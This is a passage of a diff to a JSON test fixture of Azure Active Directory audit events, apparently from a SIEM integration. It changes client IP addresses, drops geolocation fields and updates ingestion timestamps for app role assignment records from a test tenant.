"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125335600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -18073,25 +16507,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -18105,7 +16521,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -18241,7 +16657,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -18253,12 +16669,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036555500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125342100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -18284,25 +16700,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -18316,7 +16714,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -18452,7 +16850,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -18464,12 +16862,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036560400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 